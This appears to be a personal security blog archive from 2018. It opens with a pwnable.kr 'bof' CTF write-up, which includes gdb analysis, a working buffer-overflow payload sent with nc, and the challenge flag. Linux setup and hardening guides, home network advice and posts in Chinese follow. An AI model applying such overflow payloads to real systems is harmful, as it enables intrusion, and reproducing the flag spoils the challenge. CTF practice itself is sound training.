Friday, December 14, 2018

HOWTO : Solution of bof at Toddler's Bottle

Toddler's Bottle is one of the CTF games at pwnable.kr website. I am going to do the game is namely bof. There are already many writeups in the internet. However, I am going to explain what I learnt from this game.

Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof

Exploit Server : pwnable.kr:9000

The source code of the bof binary is provided. I examine the source code and found out that we are going to replace the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" variable is 32 characters long. No matter what you entered in the "overflowme" variable, the "key" is not changed as it is hard coded. It is a buffer overflow challenge. However, we are not going to take control of the return address this time.



Load the gdb with PEDA and check with "checksec". It is confirmed that the NX is enabled with another restrictions.

gdb -q ./bof



Run "disass main" to disassemble the "main" function.

disass main



Run "disass func" to disassembe the "func" function.

disass func



In the "func" function, the following codes that I am interested in.

0x00000649 <+29>:    lea  eax,[ebp-0x2c]
0x0000064c <+32>:    mov  DWORD PTR [esp],eax
0x0000064f <+35>:    call 0x650
0x00000654 <+40>:    cmp  DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>:    jne  0x66b

The "eax,[ebp-0x2c]", "ebp-0x2c" may be contained the value of "overflowme" variable and saved in eax register.

The "DWORD PTR [ebp+0x8],0xcafebabe", "ebp+0x8" may be contained the value of "key", that is "0xdeadbeef".

I am going to set a breakpoint at "0x0000065b <+47>".

b *func+47



Then "r" run the program and is prompted for entering "helloworld" as the "overflowme".



After entering the "helloworld", I am going to examine the "eax" and "ebp+0x8".

x/x $ebp+0x8
x/s $eax




The result confirmed what I suspected. I am going to check the offset the two addresses with Python. The offset is 52.



Once get the offset, I am going to overwrite the "0xdeadbeef" with "0xcafebabe" with the exploit code. The "cat" command is for the interactive with the shell.

(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000



The flag is :

daddy, I just pwned a buFFer :)




That's all! See you.


Friday, December 07, 2018

HOWTO : Flash Player on Kali Linux 2018.4

Kali Linux 2018.4 does not come with latest version of Flash Player. Since Flash Player may be vulnerable, we need to keep it to be updated. However, most tutorials in the internet teach you copy the Flash Player object file (libflashplayer.so) to /usr/lib/mozilla/plugins/ only. It is very hard to keep track the latest update this way. The following method may be the best way to install Flash Player on Kali Linux 2018.4. It works for Firefox and Chrome as well as Chromium.

Step 1 :

apt update
apt install browser-plugin-freshplayer-pepperflash pepperflashplugin-nonfree


Step 2 :

Go to https://github.com/cybernova/fireflashupdate to download fireflashupdate.sh

wget https://raw.githubusercontent.com/cybernova/fireflashupdate/master/fireflashupdate.sh

chmod +x fireflashupdate.sh
./fireflashupdate.sh


Step 3 :

To update Flash Player :

./fireflashupdate.sh

Step 4 :

You may need to change the settings at Preferences menu of Firefox Add-ons - Plugins - Shockwave Flash from "Ask to Activate" to "Always Activate".

That's all! See you.


Thursday, December 06, 2018

HOWTO : Virtualbox 5.2.22 on Kali Linux 2018.4

The current version of Virtualbox for Kali Linux 2018.4 is the latest verion 5.2.22. Since the official version of Virtualbox cannot be installed on Kali Linux, the Kali version is to be installed. Luckily, it is the latest version.

apt update
apt install virtualbox-dkms virtualbox-ext-pack virtualbox-guest-additions-iso


That's all! See you.


Monday, November 26, 2018

HOWTO : nVidia and HashCat on Kali Linux 2018.4

CPU : Intel i7-8750H (6-core with HyperThreading and Graphic Display)
Extra Graphic Display : nVidia GTX 1060 (laptop)

There are two display graphic cards on the same system, namely Optimus on laptop. The installation of nVidia display driver on Kali Linux 2018.4 is difference to Ubuntu 18.04.1 on the same system. You can refer to the link here for Ubuntu 18.04.1 even they are using the same version of nVidia display driver - Version 390.87 at the time of this writing.

Step 1 :

apt updaate
apt install nvidia-kernel-dkms primus bumblebee bbswitch-dkms nvidia-smi


Step 2 :

Reboot the system.

To confirm the installation.

nvidia-smi

Step 3 :

Install HashCat which does not require CUDA.

apt install hashcat-nvidia

Step 4 (optional) :

To install CUDA.

apt install nvidia-cuda-toolkit

To run program that requires CUDA.

bumblebeed --daemon
optirun [program]


That's all! See you.


Friday, October 26, 2018

HOWTO : Tensorflow 1.11.0 on Ubuntu 18.04.1 LTS with Anaconda3 5.3.0

Install Anaconda3 which is Python 3. The current version of Python is 3.7.x at Anaconda3.

sudo apt install build-essential libssl-dev libffi-dev python3-dev

wget https://repo.continuum.io/archive/Anaconda3-5.3.0-Linux-x86_64.sh

chmod +x Anaconda3-5.3.0-Linux-x86_64.sh

./Anaconda3-5.3.0-Linux-x86_64.sh

Install anaconda3 to /home/samiux/anaconda3 (current user, samiux) and then answer "yes" to allow change the .bashrc of samiux. (replace "samiux" with your username)

source /home/samiux/.bashrc

Update Anaconda3.

conda update --prefix /home/samiux/anaconda3 anaconda
conda update -n base conda


Since current Tensorflow 1.11.0 only supports Python 3.6 for Python 3.x, we need to install Python 3.6 at the virtual environment for Tensorflow.

conda create -n venv pip python=3.6
conda install tensorflow -n venv


To activate the virtual environment, that is Python 3.6.

conda activate venv

To deactivate it when not using Python 3.6 and Tensorflow.

conda deactivate

To test the Tensorflow installation.

(venv) samiux@ubuntu:~$ python -c "import tensorflow as tf; print(tf.__version__)"

It will display the current version of Tensorflow. The current version of Tensorflow as at this writing is 1.11.0.

1.11.0

That's all! See you.


Sunday, October 21, 2018

China - No Wallet

China's Great Leap to Wallet-Free Living - Moving Upstream

Amazing China: Mobile Payments Change Way of Life in China

Amazing China: Crazy mobile payment in China

Sunday, September 09, 2018

Croissants - Intrusion Detection and Prevention System

牛角麵包 - 防禦入侵系統

牛角麵包 (Croissants) 是一項開源項目,但有一項同名的項目是商業版本的,開源版本的名字為牛角麵包 (社區版,Community Edition)。收費版本具有禦防網絡掃描器的偵測和推送更新的技術,其他的與開源版本大致是一樣的。

牛角麵包與統一威脅管理系統 (Unified Threat Management System, UTM) 和下世代防火牆 (Next Generation Firewall, NG Firewall) 有相當程度是相若的,不同的只是牛角麵包並沒有防火牆。

牛角麵包是由黑客設計與開發出來對付黑客的一個系統,不論他們是道德黑客或者是惡意黑客。

開源版的特性 :

她具有統一威脅管理系統和下世代防火牆的大部份特性,例如防禦漏洞利用、防止病毒攻擊、惡意網絡地址黑名單、防禦惡意軟件攻擊、惡意網頁攻擊過濾、防止洋蔥網絡 (Tor) 瀏覽、防止有敵意的網絡流量、偵測網絡掃描器掃描等。

至於效能方面,她有極低延遲性的特點,有效地提高網絡遊戲的可玩性,而且能夠有效地播放 4K 的多媒體,她更能夠處理大約 40GB 或以上的流量,當然這也與硬件的規格有相當大的關係。

至於配置方面,她幾乎可以配置在網絡中的任何位置,包括網外和網內。如果再配合奧德拉 (Audra) (偵測入侵系統),這樣每個網段都涵蓋得到。奧德拉也是基於牛角麵包 (社區版) 而設計的偵測入侵系統,其元件是完全一樣的。

收費版的特性 :

除了具有社區版的功能外,她還有推送更新技術,如遇緊急情況,可以立刻對牛角麵包作出遠端更新,以求達到防禦入侵的最佳效果。

另外她還可以擋格所有網絡掃描器的偵測,令黑客不能有效地得到意圖入侵目標的資訊,從而未能有效地作出攻擊。如果盲目地作出攻擊,這是徒勞無功的。這樣就可以防止或延遲被入侵的可能性,這功能特別適合於有伺服器配置在網絡中的環境。

Samiux
OSCE OSCP OSWP


************


Croissants - Intrusion Detection and Prevention System

Croissants is an open source project and commercial project at the same time. Open source project is namely Croissants (Community Edition, CE) while commercial one is Croissants. Croissants and Croissants CE are almost the same. However, Croissants has some outstanding technique, such as push update and upgrade as well as blocking network scanning.

Croissants is very similar with Unified Threat Management System (UTM) and Next Generation Firewall (NG Firewall). However, Croissants does not have firewall anyway.

Croissants is designed by a hacker to defend against hackers. He knows what hackers are doing and thinking, regardless of whether they are ethical or malicious.

Croissants CE Features :

Croissants CE has similar features as UTM and NG Firewall, such as preventing vulnerabilities exploits, anti-virus, malicious IP address blacklisting, preventing malicious software, filtering web page attacks, preventing Tor network from being accessed, blocking malicious traffic, detecting network scanning, and etc.

It is an ultra-low latency system which is ideal for demanding online games and 4K video streaming. The maximum bandwidth of Croissants is over 40GB which is depending on the hardware configuration.

Croissants CE can be placed at any place in the network which is including outside and inside the network segments. When implemented with Audra (Intrusion Detection System), the traffic monitoring in the network can be covered completely. Meanwhile, Audra is designed based on Croissants CE.

Croissants Features :

Croissants has all the features as Croissants CE but it also has push update and upgrade features. It provides an emergency update or upgrade in order to provide a better protection to the network when needed.

In addition, it also can block network scanning. Once the scanning is blocked, hackers cannot obtain the information of the services and ports of the network/servers. They cannot launch any attack to the network blindly. You can be prevent from being attacked or delay of being attacked as a result. Croissants is ideal for network that providing connections to the public.

Samiux
OSCE OSCP OSWP

Reference

InfoSec Ninjas 资安忍者


Sunday, August 26, 2018

HOWTO : Intel and nVidia GPUs on Ubuntu 18.04.1 LTS

The version of nVidia driver for Ubuntu 18.04.1 is 390 at the time of this writing. You have 3 methods to switch between Intel GPU and nVidia GPU. However, these require your box to reboot or relogin to make the change effect.

(A) nVidia Driver Install

sudo apt install bbswitch-dkms nvidia-dkms-390 nvidia-driver-390 nvidia-headless-390 nvidia-kernel-common-390 nvidia-prime nvidia-settings nvidia-utils-390 xserver-xorg-video-nvidia-390 nvidia-cuda-toolkit

Method 1 - Reboot is required
nvidia-settings

Select nVidia GPU or Intel GPU from "Prime" on the menu. After that, reboot your box.

This method is working only when nVidia driver is loaded. You need to reboot your box to make the change effect.

To confirm the change :

prime-select query

Method 2 - Reboot is required

To change to Intel GPU :

You need to reboot your box to make the change effect.

sudo prime-select intel

To change to nVidia GPU :

sudo prime-select nvidia

You need to reboot your box to make the change effect.

To check the settings :

prime-select query

Method 3 - Relogin is required

To install modified version of prime-select :

sudo apt install git rustc cargo lightdm
git clone https://github.com/matthieugras/Prime-Ubuntu-18.04

cd Prime-Ubuntu-18.04
cd prime_socket/src
sudo make install


The "prime-select" binary is located at /usr/local/bin.

Rename the original "prime-select" :

sudo mv /usr/bin/prime-select /usr/bin/prime-select-original

Change to lightdm :

sudo dpkg-reconfigure gdm3

Select lightdm and then reboot the box.

Prime sync for tear free laptop panel

sudo nano /etc/modprobe.d/zz-nvidia-modeset.conf

Add the following lines :

# enable prime-sync
options nvidia-drm modeset=1


Then run the following command and then reboot your box :

sudo update-initramfs -u

To change to Intel GPU :

sudo prime-select intel

The box will force you to logout and awaiting for your re-login.

To change to nVidia GPU :

sudo prime-select nvidia

The box will force you to logout and awaiting for your re-login.

To check the settings :

prime-select query

(B) Optional

To check what nVidia driver version is installed :

ubuntu-drivers devices

To auto install the nVidia driver :

sudo ubuntu-drivers autoinstall

(C) Conclusion

To set to Intel GPU for power saving while nVidia GPU for performance. For Kali Linux or Parrot Security OS users, I recommended to use Method 2 after installed the nVidia driver. The package name of nVidia driver for Kali Linux and Parrot Security OS are different from Ubuntu 18.04.1 LTS. When using Method 3, the Intel display card cannot be video properly. However,, Method 2 has no such problem.

That's all! See you.


Thursday, August 09, 2018

滲透測試與奪旗賽

初次接觸奪旗賽 (Capture The Flag) 比賽項目,發覺其與真實的滲透測試 (Penetration Testing) 相差甚遠。以奪旗賽練習網站中的網頁 (Web) 題目為例,奪旗賽題目會提供提示以供下一關的鑰匙,或者以這個提示來完成這條題目。但現實環境的網站滲透測試是沒有提示的,滲透測試員是要用自己的方法去盡量搜集這個網站的資訊來作進一步行動。再者,奪旗賽的題目大多是脫離現實,而且十分狡猾 (tricky)。

我個人認為如果一個專業的滲透測試員長期在奪旗賽題目中打滾浸淫,有可能影響其專業的思維和滲透測試的方式,並且在其專業知識上並沒有實際的獲益,但是閒來作為遊戲玩樂又未賞不可的。

至於奪旗賽中另一個比賽項目攻防戰,我仍未曾有機會接觸到,所以不會妄下判斷。因機緣巧合,最近在一個很爛的奪旗賽練習網站 (beta.ctflearn.com) 玩了一些我懂的題目,並且在一萬二千幾名玩家中排行第廿七 (二零一八年八月九日止)。在玩的過程中並未有學習到新鮮事物的感覺,非常可惜。

最後,我個人認為,如果要在滲透測試知識和技術上有實際的獲益,我想最有效的方法是參加懸賞計劃 (Bug Bounty) 了。如果可以發現漏洞並獲得獎金當然是一件樂事,但如果未能取得獎金都可以在一個合法的平台上練習,因為懸賞計劃中的項目全部都是真實的個案。

Samiux
OSCE OSCP OSWP

Wednesday, August 01, 2018

馬恩國解讀認識基本法系列

馬恩國解讀認識基本法 (一) 基本法出處




馬恩國解讀認識基本法 (二) 釋法篇之吳嘉玲案




馬恩國解讀認識基本法 (三) 釋法篇之剛果案




馬恩國解讀認識基本法 (四) 釋法篇之政改及特首任期




馬恩國解讀認識基本法 (五) 釋法篇之立法會宣誓案




馬恩國解讀認識基本法 (六) 釋法篇之《基本法》的解釋權及釋法好處




馬恩國解讀認識基本法 (七)主權與國家安全




馬恩國解讀認識基本法 (八) 高度自治與全面管治




馬恩國解讀認識基本法 (九) 五十年不變與一國兩制




馬恩國解讀認識基本法 (十) 中央與特區關係




馬恩國解讀認識基本法 (十一) 特區的立法權與緊急狀態下的安排




恩國解讀認識基本法 (十二) 港人參與國家事務的渠道




馬恩國解讀認識基本法 (十三) 香港人的權利




馬恩國解讀認識基本法 (十四) 行政會議、特首職能與解散立法會的權力




馬恩國解讀認識基本法 (十五) 行政機關




馬恩國解讀認識基本法 (十六) 立法會




馬恩國解讀認識基本法 (十七) 司法機關




馬恩國解讀認識基本法 (十八) 公務員待遇及宣誓




馬恩國解讀認識基本法 (十九) 對外事務




馬恩國解讀認識基本法 (二十) 基本法的修改權




If Loving You Is Wrong (I Don't Want To Be Right) - Barbara Mandrell


國家安全與《中國國家安全法》

余非 — 處理嘍囉,及認知更根本的考慮──國家安全與《中國國家安全法》



Thursday, July 19, 2018

[LAB] Capture The Flag - July 2018

VulnHub gathers a lot of Capture The Flag virtual machines for practice.

In July, 2018, I did some of them and wrote the writeup about the exploits. I mainly targeted for the VirtualBox virtual machines only. They are running NAT Network interface in VirtualBox.

They are :

(1) BlackMarket
(2) BSides Vancouver 2018 (Workshop)
(3) JIS-CTF : VulnUpload
(4) Bob v2
(5) Toppo v1
(6) DerpNStink v1
(7) Temple of Doom v1
(8) Zico2 v1
(9) Dina 1.0.1
(10) Basic Pentesting : 2

That's all! See you.


Friday, June 29, 2018

阿希從衆實驗

近日與友人聊天時聊到阿希從眾實驗 (Asch conformity experiments),這個實驗發現了大多數的人會在群眾的壓力下盲從附和或改變自己的見解去跟從衆人的情況。

Asch conformity experiments






友人立即引述馬克吐溫的名句 :

Whenever you find yourself on the side of the majority, it is time to pause and reflect. -- Mark Twain

每當你發現自己和大多數人站在一邊,你就該停下來反思一下。 -- 馬克·吐溫

其後我領會到這句名句有另一方面的意思,就是如果發現了你自己在大多數人當中的時候,你應反思你是否停滯不前沒有進步?

參考連結

維基百科 - 阿希從衆實驗
Wikipedia - Asch conformity experiments


Monday, June 18, 2018

深度系統與優麒麟

深度系統與優麒麟都是國內知名由國內開發的 Linux 系統,她們各有特色,現在介紹一下。

深度系統 (Deepin Linux) 是由中國武漢深度科技公司基於 Debian 穩定版進行開發。其中的深度系統桌面環境 (DDE) 是深度科技公司的一個開源項目。

深度系統支援多國語言,其桌面環境設定簡單直覺,並沒有多餘的步驟。她備有自己的軟件庫,而當中的軟件是常用軟件,安裝和移除軟件簡單容易,只需一鍵點擊就可以了。微軟視窗系統的軟件大多可以在其中運行,因為這系統是專為用戶由視窗系統過渡到 Linux 而不能不使用微軟視窗的產品而設計的。她開機和關機都十分快速,唯一的不足之處是她並不支援全碟加密的設定。

優麒麟 (Ubuntu Kylin) 是由工信部軟件與集成電路促進中心和中國人民解放軍國防科技大學與 Ubuntu 的支援公司 Canonical 在北京聯合創立「CCN 開源軟件創新聯合實驗室」而開發的。其桌面環境是基於 MATE 的 UKUI。

優麒麟是專為國內用戶而設計,雖然她支援多國語言,但其專有的軟件庫是簡體中文介面的。她是為那些由微軟視窗轉到 Linux 又完全放棄視窗的用戶而設計的。在其軟件庫中,她會介紹有那些是微軟視窗軟件的代替品,非常體貼。她的 UKUI 用戶介面非常類似視窗介面,用戶是不會陌生的,但她百分之百是 Ubuntu。所有軟件是最新版本,而設定方面亦與 Ubuntu 一樣。

深度系統與優麒麟所面對的客戶群各有不同,目的都是為視窗用戶轉移到 Linux 而設計的,各有其優勢之處。如果大家有空的話,可以安裝深度系統和優麒麟,體驗一下其功能和設計。


深度系統
優麒麟


Sunday, June 17, 2018

For Want Of A Nail (只因少了一颗钉)

For Want of a Nail

For want of a nail the shoe was lost.
For want of a shoe the horse was lost.
For want of a horse the rider was lost.
For want of a rider the message was lost.
For want of a message the battle was lost.
For want of a battle the kingdom was lost.
And all for the want of a horseshoe-nail.

-- Benjamin Franklin


只因少了一颗钉

少了釘子,失了蹄鐵。
少了蹄鐵,失了戰馬。
少了戰馬,失了騎士。
少了騎士,失了情報。
少了情報,失了勝仗。
少了勝仗,失了王國。
這全因少了馬蹄鐵釘。

-- 佛萊登




See Also

The Butterfly Effect

In chaos theory, the butterfly effect is the sensitive dependence on initial conditions in which a small change in one state of a deterministic nonlinear system can result in large differences in a later state.

蝴蝶效應

蝴蝶效應 (Butterfly effect) 是指在一個動態系統中,初始條件下微小的變化能帶動整個系統的長期的巨大的連鎖反應,是一種混沌的現象。“蝴蝶效應”在混沌學中也常出現。


The Broken Windows Theory

The broken windows theory is a criminological theory that visible signs of crime, anti-social behavior and civil disorder create an urban environment that encourages further crime and disorder, including serious crimes. The theory thus suggests that policing methods that target minor crimes such as vandalism, public drinking and fare evasion help to create an atmosphere of order and lawfulness, thereby preventing more serious crimes.

破窗效應

破窗效應(英语:Broken windows theory)是犯罪學理論,由詹姆士·威爾遜及喬治·凱林(George L. Kelling)提出,刊載於《The Atlantic Monthly》1982年3月版的一篇題為《Broken Windows》的文章上,論及環境中的不良現象如果被放任存在,就會誘使人們仿效,甚至變本加厲。


Reference

Wikipedia - For Want of a Nail
维基百科 - 只因少了一颗钉
Wikipedia - Broken Windows Theory
维基百科 - 破窗效应
Wikipedia - Butterfly Effect
维基百科 - 蝴蝶效应


That's all! See you.


Friday, June 08, 2018

家居網絡安全守則

鑑於近日發生了很多路由器和網絡儲存裝置被入侵的事故,我覺得有必要加強一下我們對家居網絡安全的知識。大部份人都是對網絡安全一知半解或者完全一竅不通的,所以我會用一些直接的方式去說明而避免了一些專業的用語。

路由器 (Router)

路由器有分有綫和無綫兩種,而大部份的家居路由器都是二合一的版本,即是有綫和無綫功能集於一身。

在設定路由器時,必須要更改路由器預設的密碼,更要有一個較強而複雜的密碼。

在設定路由器管理時,絕對不可以設定為可供遠端管理 (Remote Management) ,即是不可以在家以外的地方來遙控管理路由器。通常大部份的路由器預設遠端管理是啟動的。

在設定無綫路由器時應當設定為 WPA3 制式,如沒有的話至少要設定為 WPA2。至於加密方面,最好是 AES 並且至少要有十二位的密碼,而密碼方面就需要包括英文大小楷、數目字和標點符號。在本年底 WPA3 的路由器將會面世,在此時必須要設定為 WPA3 制式。

經常更新路由器韌體 (Firmware),若果官方一年或以上沒有發表路由器韌體更新或型號已經停產的話,就必須購買新一款的路由器替換。永遠要保持路由器的規格是最新的。

不要輕易開放埠 (Port),需要檢查一下有沒有埠是開放於互聯網中,例如埠 22 (SSH)、23 (Telnet)、80 (http)、443 (https) 或 8080 (proxy),如有發現的話,我強烈建議立即關閉這些埠在互聯網中開放,要注意的是有些路由器是預設開放的。

桌面電腦 (Desktop)

經常更新作業系統,保持其為最新版本。不要安裝或下載不明來歷的軟件,更不應使用侵權軟件或多媒體。要經常更新瀏覽器並且不要瀏覽不良網站或侵權網站。最好是安裝及啟動防火牆並且不可輕易開放埠 (Port) 。

如果是微軟視窗系統的話,一定要安裝防毒軟件。蘋果公司的 macOS 或 Linux 的話,可以考慮安裝防毒軟件。至於 Linux 更可以零成本加固的 (詳情可以參考我的博客)。

不可以繼續使用舊版本的作業系統 (Operating System),更不應使用已經停止支援和更新的作業系統。

網絡儲存裝置 (NAS)

若果有網絡儲存裝置的話,我絕對不贊成直接接駁到互聯網作遠端存取。如果必需要遠端存取的話,我強烈建議必須使用虛擬私人網絡 (VPN),並必須經常更新韌體。通常虛擬私人網絡都可以在比較貴價的路由中找到。

最後,祝大家安全地和暢快地在互聯網中衝浪!

Samiux
OSCE OSCP OSWP
二零一八年六月七日 中國香港



Home Network Security Rules

Recently, there are a lot of routers and network attached storage (NAS) devices infected by malware or being attacked. It is a high time to refresh our home network security knowledge.

Router

There are wired and wireless routers in the market. Home routers equipped both. We should change the default password of the router in the login control panel with strong and complicated password. It is not wise to let the router to be controlled remotely. It is better to disable this feature or function even it is enabled by default.

When setting wireless, it is recommended to set it to WPA3 when it is available in the end this year. If not, at least set it to WPA2 with AES encryption. Strong and complicated password should be set. Make sure uppercase and lowercase, numberic and symbols to be set for the password.

Update the router firmware when it is available and always keep it up-to-date. If you do not get the firmware update for more than a year from the vendor or the router has been phased out, you should purchase a new and modern one.

Make sure port 22 (ssh), 23 (telnet), 80 (http), 443 (https) and 8080 (proxy) are not opened or forwarded to the public in the router.

Desktop

Update your operating system often and keep it up-to-date. Do not install any pirate or unknown sourced software or multi-media. Make sure no port is opened to the public.

If you are using Microsoft Windows systems, it is recommended to install anti-virus program. You may consider to install anti-virus program on Apple macOS and Linux systems. Meanwhile, you can harden your linux system with no extra cost, for details please read my blog.

Never use a not up-to-date operating system especailly when there is no more support or it is already phased out.

Network Attached Storage (NAS)

Make sure update the firmware with the latest firmware often. I am not recommended to let your NAS to be accessed from the internet. I strongly recommended to do it via virtual private network (VPN) when necessary. Most expensive routers may equipped with VPN feature.

Finally, happy internet surfing!

Samiux
OSCE OSCP OSWP
June 7, 2018 Hong Kong, China


Wednesday, June 06, 2018

保衛橋頭堡

嚴格來說我身兼數職,我既是開源項目開發者、系統管理員、網絡滲透測試員、資訊科技安全硏究員、又是公司文員。我是一名資訊科技安全愛好者,擁有有關的專業認證,就是 OSCE,OSCP 及 OSWP。

我家裏有兩個網絡,一個是日常運作的網絡另一個是用作滲透測試和軟件測試之用。日常運作的網絡中有一台網頁伺服器,一台私人雲端檔案伺服器,一台虛擬系統伺服器,二台路由器和一台防禦入侵系統,網頁伺服器還有人工智能網頁防火牆。

我每日的例行工作是更新所有桌面系統及伺服器系統,閱讀有關資訊科技安全有關的新聞和硏究報告,開發資訊科技安全有關的開源軟件或系統,撰寫博客等,作為一個業餘的資訊科技安全人員來說真是工作煩多。

因為我有編程和資訊科技安全底子,所以我開發了一些資訊科技安全的開源項目,其中有防禦入侵系統 (Croissants,牛角麵包) 和人工智能網頁防火牆 (Longjing,龍井),它們都是由我自主硏發的。

我所開發的防禦入侵系統能夠防止已知具有惡意的網絡地址存取我的網絡、可以防止已知的惡意軟件的下載或存取、可以防止網絡掃描軟件向我的網絡進行掃描、可以防止一些已知的安全漏洞被利用、防止我瀏覽一些已知的惡意網站。它具有極低的延遲特性,可以讓我流暢地觀看 4K 視頻及玩綫上遊戲,而且所有防禦入侵的安全規則都是免費的,更兼容各大常用電腦和手機系統。在硬件上的要求並不算高,建設成本極低,具有效率高和防禦性強及經濟的特性。

至於網頁防火牆,它是一個深度學習的人工智能網頁防火牆,這是一個開源項目。它主要是防禦資料庫注入 (SQL Injection, SQLi) 的攻擊,但它亦能夠防禦跨站腳本 (Cross Site Scripting, XSS) 和一些較低危險性的攻擊,它更具有迷惑網站漏洞掃描器的能力。若果有惡意的黑客利用網站漏洞掃描器來掃描我的網站,他們的掃描器會回報極多的漏洞,但是這些漏洞完全都是誤報的,這樣那些惡意的黑客就會被我的網頁防火牆誤導而浪費了很多時間去對每一個誤報的漏洞來查證。這個人工智能網頁防火牆極易安裝和維護,雖然效率並不十分高但其偵測準確率達到九十九巴仙以上,這是十分不錯的。

就是因為這兩個由我自主硏發的開源項目的應用,我可以比較安心地處理其他的資安事項而無需時常要親力親為地監察我的網絡安全。雖然這個世界上沒有絕對安全的電腦系統 (No System Is Safe),但我的開源項目的確能夠分擔一些煩重的資安工作,這是非常理想的。再加上我在每一台 Linux 桌面系統及 Linux 伺服器都加固了,尤其是火狐瀏覽器,這樣我就更安心了。

我就是這樣保衛我的橋頭堡 - 網絡。



Bridgehead Defense

I am not only a clerk but also an open source project developer, system administrator, penetration tester, information security (infosec) researcher. I am an information security enthusiast with OSCE, OSCP and OSWP certificates.

I have two networks at home, one of them is for production and the other is for testing purpose. There are a web server, a private cloud server, a virtual machine hosting server, two routers, an intrusion detection and prevention system (IDPS) in the production network. Meanwhile, there is a web application firewall (WAF) for the web server too.

I update all my desktops and servers; read information security articles and research reports; developing infosec related open source projects and writing blog articles every day. It is a lot of work for a amateur information security guy indeed.

Since I have programming and infosec background, I develop some infosec related open source projects, such as IDPS (Croissants) and deep learning driven WAF (Longjing).

The IDPS prevents known IP addresses with malicious intention to access my network; it prevents known malware from being downloaded or accessed; it prevents my network from being scanned by vulnerability scanners; it prevents known vulnerabilities from being exploited; and it prevents me from accessing malicious web sites. Meanwhile, I can watch 4K video and play demanding online games due to the low latency of the IDPS. All the rules are free of charge and it is compatible with popular operating systems and smartphones. It is a low cost and high performance solution.

For the WAF, it is an open source deep learning driven WAF which is mainly designed for prevent the web application from being attacked by SQL Injection (SQLi). However, it also detects Cross Site Scripting (XSS) and other vulnerabilities too. It spoofs all the web application vulnerability scanners that causing it to produce a lot of false positive results. Malicious hackers will waste a lot of time to figure out what is happened. Although the WAF is not designed for performance, the SQLi detection rate is over 99%.

It is what my open source infosec projects implemented into my network for security purpose that allows me to do my researches and infosec projects development without worry. Although no system is safe, it helps me a lot for the network monitoring. Meanwhile, I also hardened all my Linux desktops and Linux servers and including browser - Firefox. As a result, I am feeling very good for that.

It is the story about my bridgehead defense - network.


Thursday, May 31, 2018

何謂「自主硏發」?

最近經常聽到或見到「自主硏發」這個詞語。可是中國香港的同胞們都經常誤解了這個詞語,他們認為「自主硏發」是由零做起的,但我並不同意這個看法。

根據「百度百科」的資料,「自主」是指 :

「自主指自己作主,不受别人支配。心理学中自主就是遇事有主见,能对自己的行为负责。」

根據「百度百科」的資料,「硏發」是指 :

「研发,英文为 Research & Development,简称 R&D,即研究开发、研究与开发、研究发展,是指各种研究机构、企业为获得科学技术(不包括人文、社会科学)新知识,创造性运用科学技术新知识,或实质性改进技术、产品和服务而持续进行的具有明确目标的系统活动。一般指产品、科技的研究和开发。研发活动是一种创新活动,需要创造性的工作。」

現在有很多科技項目都是開源的,原創者或作者容許其他人在其的開源契約下免費使用或更改,然後再以開源契約再發行。這樣我們並不需要將車輪再發明,只要站在智者和賢者的肩膊上再創新就可以了。

例如我有幾個開源項目都是基於另一個或一些開源項目開發的,好像「牛角麵包」(Croissants),她主要是基於開源的 Suricata 引擎和其他的開源項目,由我硏發出來的入侵防禦系統。例如我的另一套開源項目「夜鷹」(Nighthawk),她是基於一個開源項目 Tor 來開發的。又例如我的另一套人工智能網頁防火牆「龍井」(Longjing),她是使用了 Scikit-Learn 的開源程式庫來開發的。這些都是由我自行開發的開源項目,這也可說是「自主硏發」吧。

所以我個人認為「自主硏發」這個詞語並不是指所有的開發都是由零開始的。這就好像我們不需要再發明飛機,只要改良飛機便可以了。又或者可以由飛機這個項目進化到另一個產品項目一樣。

参考連結 :

「百度百科」-「自主」
「百度百科」-「硏發」
「牛角麵包」
「夜鷹」
「龍井」
Wikipedia - Research and Development


後記

「自主硏發」這個詞彙的由來或多或少是有其歷史背景的。一直以來,美國是禁止高科技產品出口到中國,如有違反會予以監禁和巨額罰款,如果你是華人的話還冠以間諜罪名。所以中國便要硏發出相應產品供國內使用,而這詞彙就不脛而走了。


Wednesday, May 30, 2018

HOWTO : Hardening And Tuning Of Ubuntu 18.04 LTS

This guide is going to hardening and tuning your Ubuntu Server/Desktop 18.04 LTS without extra effort.

(A) Buffer Overflow Prevention

Make sure "No Execute (NX)" or "Execute Disable (XD)" in the BIOS/UEFI has been enabled. Then run the following command :

sudo dmesg | grep --color '[NX|XD]*protection'

[ 0.000000] NX (Execute Disable) protection: active

If you see the captioned output or similar, you have set it right.

(B) Kernel Hardening and Tuning

Copy the content to the file "60-croissants.conf" :



sudo nano /etc/sysctl.d/60-croissants.conf
sudo sysctl -p /etc/sysctl.d/60-croissants.conf


The configure file would hardening the kernel with parameters which is including ASLR.

(C) Firefox Hardening (For Desktop Only)

sudo apt install apparmor-utils
sudo aa-enforce /etc/apparmor.d/usr.bin.firefox


To change to complain mode :

sudo aa-complain /etc/apparmor.d/usr.bin.firefox

(D) SSD Tuning

Append "scsi_mod.use_blk_mq=1" to "GRUB_CMDLINE_LINUX_DEFAULT" :

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash scsi_mod.use_blk_mq=1"

sudo update-grub

Then reboot the box.

(E) File System Tuning

Insert "noatime,nodiratime,norelatime," to the "/dev/mapper/ubuntu--vg-root" :

/dev/mapper/ubuntu--vg-root / ext4 noatime,nodiratime,norelatime,errors=remount-ro 0 1

sudo mount -a
sudo mount -o remount /


Make sure there is no error displayed. If you find there is an error, do not reboot the box until you have fix what you have edited. Otherwise, you cannot reboot the box properly.

That's all! See you.


Monday, May 28, 2018

[RESEARCH] How Secure Of Your Wifi Netowrk

Some information security experts still suggested to hide your SSID and set MAC address filtering in addition to WPA2, AES and strong passphrase setting in order to keep your wireless network secure.

However, most wireless hacking tools can unhide the hidden SSID, meanwhile, MAC address can be easily spoofed. Fortunately, there is a feature that can be used to harden your wireless network. It is namely Protected Management Frames or IEEE 802.11w even it is still not a standard since 2009.

What are Protected Management Frames (IEEE 802.11w) ?

Wi-Fi CERTIFIED WPA2 with Protected Management Frames provides WPA2 protection for unicast and multicast management action frames. Unicast management action frames are protected from both eavesdropping and forging, and multicast management action frames are protected from forging. WPA2 with Protected Management Frames augments WPA2 privacy protections already in place for data frames with mechanisms to improve the resiliency of mission-critical networks.

